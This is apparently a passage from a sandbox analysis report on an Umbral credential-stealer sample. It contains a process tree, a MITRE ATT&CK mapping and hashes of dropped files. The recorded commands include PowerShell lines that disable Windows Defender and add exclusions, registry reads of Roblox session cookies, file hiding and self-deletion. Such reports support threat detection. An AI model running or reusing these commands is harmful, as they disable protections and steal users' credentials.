        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Executes dropped EXE
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        7⤵
        Executes dropped EXE
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:4288
      - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        6⤵
        Executes dropped EXE
        
        PID:2336
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2712
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:3148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:1140
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2184
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4388
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2112
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5004
    - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        5⤵
        Executes dropped EXE
        
        PID:1488
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Executes dropped EXE
        
        PID:560
  - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
      "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
      4⤵
      Executes dropped EXE
      PID:3212
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:2872
- - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
    "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
    3⤵
    - Executes dropped EXE
    PID:3980
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:1936
- C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
  "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
  2⤵
  - Executes dropped EXE
  PID:2192
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:784
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:4044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4272
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:4812
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3764
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:216
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1548
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
19fa667a538a7330e0784409cd460887

SHA1
48f1f0a7efd3404dfc38feb106c107ce259382cc

SHA256
45872ce54fd391ad3744d35486e135c692867aef1e1fe897fe9d7ab174948fbf

SHA512
0f9fa8e0342184fde1359ca2cb31a31c65accbe1af8bdd12d41c389b2c32b5410faf7915580aeac62edda9bb5b857c80ce4b6e44608abc123b6eb3400e329dd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\loader.exe.log

Filesize
654B

MD5
16c5fce5f7230eea11598ec11ed42862

SHA1
75392d4824706090f5e8907eee1059349c927600

SHA256
87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

SHA512
153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\loaderexp.exe.log

Filesize
871B

MD5
84a419e80a36d8d1a556ab007368d5fe

SHA1
bfb7c91c661a574c28bea24fac02a821296d58c1

SHA256
998c3cc19fd4c49ace01768f5d67c93d1d468d06ad80525c5638419007c23ee0

SHA512
fd93266ae38aca410fe4da160a387415fe4cb1953150cc62c6b7993954df74f42abff3692539210890b629c4fccbe5c49b201363a770f5f07d9eae009fca39ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc3e1cb217dae76ca5e6bf649192add6

SHA1
40c1767ba3139feaeb6e73aa50ccd9efaca3a0c9

SHA256
fe9159b24c9152740ad60aaf51ae176889e70019e0df052d86a6053a0b8d3831

SHA512
2b4787b32bf01dafbe5e078df53b31937140f6d1b7dc4817d34a437f9738cf606f94684e0b1fa109da18cf55f6693e7c1df4f482da0bd1ceefadc171bd331c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
86081bc84f5d98215bb5ff155db0c8f8

SHA1
62d20a09829f3cb88ad17fc2c0f20eebea2c9e2c

SHA256
6516b22a90127c0537953f369f5633318562416e46c354fe64109738fbeb704e

SHA512
7d998cc9a29352cb1a871fc795ad1c6702a28a0a27df196196becf0765d78753511c93673957d1f194915b193ba42c78b4a6a525817196265c07ec80c7709e44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ef06a0bed16c8b2727e711f9b771b8a4

SHA1
d0cc2f5314cba47d5f04ed36fe36712727c007b3

SHA256
48560bc8efe448ba92b3425582ac0a400ba772932a25eac385976ba6ff17d347

SHA512
6f902727dc79cf5059c1d7e39d6ba2f70d611dd5e0f39f2eb4c64cbef65b54a85be54a80d0b8354014452bff517ec687685721d10d2b102b9dcaf830a664ba54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7930ff6c3b85ea065f8539fbdcb8a7df

SHA1
dc556bd6432df5a827285920fe4bfeb3a2835d9a

SHA256
e81d54f86c750a6253b18a5e5704c9ee0a4e36a7837de135ef4c7697bb36ba2c

SHA512
45353f0ad34caa3f6912481a9a189dca34148f9e577a12600da28b4bc7b33f07eea96f713b2c2e74d7fc983189935e7774428d0ae86e06df3322963f1a7a4383

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
421e92ad68730a7ba615c76304e0a89e

SHA1
444e119605e4973bdb5ff9b16ddf4e8b4061c8ae

SHA256
8fe38f55ee70ccea1e19be7bd9b01cb308c38ccf40814a3f69004fc3392a38ee

SHA512
27ee351ae470ac51c737fdc57c3a25f4bc1cbcf7a188cbffc20b1f17968e09dd0da36c1d5cfe2f5564b062ecbe6b63a49acbe37bf32d31e5ca92986adf53d6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7aa14e4046374e6a6cec11b0f59e49d0

SHA1
fc97e39b19c96988530922297aebadeb2a96d865

SHA256
74e1513904a555f00fbe81fcb77d0681c1e69a6bdb4ca8bee841e762f3831b66

SHA512
301d26a1903b34c2580fc5fe0a3da34aafa3511d459f963890af69ede8bea5cbe64d40668582855f93e01225435ce0da6f56ef7c699273d76344d6dc83479efd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
557efbd89b5847b2fe2ad7e6a7bebf6c

SHA1
d44b616ebdacd695a995ebcbc087938c3afb05a9

SHA256
9c7996132f93563725b567699fc6819953eccf7aff856ddd17fa21ddb9ed3426

SHA512
de2e50ae44e56c80ab087804ce8010cbd2e28bc626582e3545edad4c2ce959655c5a8301438b2b3737d4759b17f721477301130e00cff54d56110a771a33026c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c22d8f8a08ebc2446526d2f702e64e83

SHA1
249fd6b8a5f9e1399efd4c67db2111232c249d1a

SHA256
3afa4f77bb3a9eb65afd7d412946bab0b90298f5c58ae2495a1ddb2f4c971540

SHA512
5607e55f387103137041e22ba8641fbaf3c40513ab65251804b4a8e55ce692aaaa205d6a2156cfb2ef483de69ac90378a6347d6582210c7733231d86c5299971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c53feb22976b99be1aa4e4af54c8637d

SHA1
580f97fd7e1ee6d16c4afd755b8d5b5a554e05e0

SHA256
8e4a684bc8859a7b9ff400be0cd478ef9339680a03054aa1e7036a5e24b07414

SHA512
75e8e079bd2e687f02dcacd81507719cea7672088d333ac0e53c7a522ee5963b3eefc8e47f1d0ac375c75608e12dce70e62a650f13f81cf8fbfcbf0683a75f6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1ead4954d52474bf1a19606fad503df

SHA1
3bdd4710ab00f0b54143206a74930ef04eb1e37d

SHA256
0923aeb048e14ca3de1e50b43c30650653555998485b5c2ea6c38f4fa0d0ffa5

SHA512
170f40bdccfee3beba9e36224789f7128a3550c031cb2345ad197703e431695e58d2df5e3892ed0a671049d9b94097f54de5cc4ec115f19fca550a78139a5945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
77b0da7e6186f0d1fbe28879f48f4b8b

SHA1
49c130b31e782d826c7c318590d4274c09141438

SHA256
60e6d0e930c007cadb3fd409162f1a9213dc3e9ebb3bdde5cdb780883511b243

SHA512
060faa89c9aabfab2adc966b0637692c3338740ec7560b9ad2dc715c344594e00506d37731ee20cb66b052e36cde968dd8c4e69e9fdbe80d94d354949d846625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bacf75637f982996918106da1d6ebb80

SHA1
14430cd557f8e274e28c096392464cb795ba22ba

SHA256
2d65c07bea0b9f9ae6b8ab08a2763138c1de87453317d42ef59fa69bd9ae43f7

SHA512
0697c908b099dc96bc1e2df707e303db707d7ae4a0e5a38529446e8121768c2b64ac9d726f3a37227208a26ec81967a1beb0ed7cc1068db8f9ee351ccce6f257

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37fbad2d74dbd435e007754bc3f72c0a

SHA1
5a2dc259f11bc324ec27f6dabbe79b8fe18b9b9a

SHA256
d6051df0921d229f82fd17e2716ec8c177a67d72b4fd73c73de785da179d35e4

SHA512
5bb5f477ebe7abfd9c38efe44c549e6a826e0c7e841cb14d714982318ecf80300afd5e85bff54fb7e38594132ebd9a89546543f192f206752b79d927bcbc9a1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
556a2770b4f2c188b9ddaa28affeb1df

SHA1
f11236e2352671dffa10bca331c32d422fad3f1d

SHA256
26faad02bdf5f06ca7f4762a27b849edcec8b5eb196678d1af3611c05e54afc1

SHA512
670c2fc6ef20c26668a825bbbb80d6e073626298503893efbc6e7d97a899f6fa59d3fcacd2f1ee0ce5b8f6f6b711cd3eb952e77e53fd00538e3b48eb631cb8e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6ec688e0716a3619decb9686e058c37

SHA1
5dacd014841ff6a25a9851c7836c5f5174c2759b

SHA256
ad730c0c69c39939360162b87ffac33f99a190f0ac13c1b45a15e9862a2f7094

SHA512
7311910577a6bb2cf8e18f151c354145d678b0abab08e91af1ad320e0711b0ea5a77e15aec557cedd385a6595bbc74a9e1e7c0c6b25702ea3a7c97310975a1b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e90d5379227f33f4450670c1d2db0a1

SHA1
e1ac6c26aecb8aa67a7666f8a4e3a385bc9ab81c

SHA256
33f3e099ab8a10bc733636fa753231d844061b4495eb3e9afd091909cbd283c2

SHA512
1d118dce35586b64d09dbe3498196d4a06a74940605e3ca5f245483ba15031c327b3bbf3413d53a9a9eb208be8af5a47c1d50bf479d69f383186c7c5a8cd6cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\0GyiuEslhFhm4pc

Filesize
20KB

MD5
154e8f1827b3a993b0a37c10fda9b168

SHA1
1c1c9b6c1f177d6f43e54b57b78b1d5e3c2a2ef9

SHA256
07aff8a809cc8a7c98fda5e2bc187446afbb9ad9d0aaf55297ba1c648f9c1945

SHA512
82d66be284872f25090e407cc73fa1415cd72f7030244a48cf910df7863ac56e912a286e3cf716a03c02082f7d9858a0c0efe4240c7ebf9fa788c1cb9e7a2a76

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArUW879Fqie4l18

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
35bfad8beb24021798e8410c299fb64a

SHA1
064970ecd6e29be2cb5da7cb73f718e326e1b785

SHA256
73ce24ee931d0a3fd27a395bad1b3b45a8c7a2f1841432868ee0e9a16ea56c4e

SHA512
d95d9ffbd89cbea4958eec3e4a4544d87112bff4a35acbc43a4705b4f5c1d2709831a75e6a7838be7359c8033bb3a08e89ad33b743b548c0b95b631666ad1584

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbsot201.2b0.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\loaderexp.exe

Filesize
407KB

MD5
1beb7aa96b112bf1cdea3f8ae277002a

SHA1
0a846c4794c62694c8765f0b8e58ea9e807e2a97

SHA256
a62b25c555f2e0943d0494fd88ee92b7fe64b17ee3f9ee294cd6f9f1362a63ed

SHA512
9667870c6994936d3e8fdd46b87feb701320552a707b9728ef53cdef995bd765729856f8f6af08800e4ea5db8905c9bf1bf5c9ed7fcf657500283f55fecaa056

Download Submit
C:\Users\Admin\AppData\Local\Temp\qZIjx10FMg2JPzL\Browsers\Cookies\Chrome Cookies.txt

Filesize
224B

MD5
2fc8308429efd48926cb4960171f3ab1

SHA1
dee787d80f9cfa1a6f2749119ddb039385c5ce24

SHA256
51a1380722fafa9d5d0965739089909b0b23f9b70220630207dc3ae1fd8a3045

SHA512
637c1de46dbef1d78b750b321374f5ea2c1db9479f704827d84e3dd695080e72755f3e2484e03e8010660e090efd1fccb355f0827a510b46ab0350e56c44d98e

Download Submit
C:\Users\Admin\AppData\Local\Temp\qZIjx10FMg2JPzL\Display\Display.png

Filesize
430KB

MD5
33f27149c2faa30f115cb3d8b51d1134

SHA1
5d5bba23eb2f0aed7be322713d8f356a1161db40

SHA256
51a25538c7edc0fc408fcdf33311a6f7cd3f99997abce59259b63f2749934b75

SHA512
62dcd73b2aff0a56837a3b1492db10813e702ee42e217cc8987654d07baa0775f84f074a66478647a57b400b113b64d5b28cc5bc853d1a493295c8d72fb9e9c0

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
memory/784-181-0x0000020F253E0000-0x0000020F253EA000-memory.dmp

Filesize
40KB

Download
memory/784-182-0x0000020F25430000-0x0000020F25442000-memory.dmp

Filesize
72KB

Download
memory/784-16-0x0000020F0AD70000-0x0000020F0ADB0000-memory.dmp

Filesize
256KB

Download
memory/784-109-0x0000020F253F0000-0x0000020F2540E000-memory.dmp

Filesize
120KB

Download
memory/784-108-0x0000020F254E0000-0x0000020F25530000-memory.dmp

Filesize
320KB

Download
memory/1380-28-0x000001C156530000-0x000001C1565A6000-memory.dmp

Filesize
472KB

Download
memory/1380-25-0x000001C156380000-0x000001C1563A2000-memory.dmp

Filesize
136KB

Download
memory/2192-20-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download
memory/2192-17-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download
memory/2192-11-0x0000000000DC0000-0x0000000000E2A000-memory.dmp

Filesize
424KB

Download
memory/3652-13-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download
memory/3652-72-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download
memory/4472-0-0x00007FF8EE9D3000-0x00007FF8EE9D4000-memory.dmp

Filesize
4KB

Download
memory/4472-1-0x0000000000BB0000-0x0000000001B2C000-memory.dmp

Filesize
15.5MB

Download
memory/4472-2-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download
memory/4472-18-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

Filesize
9.9MB

Download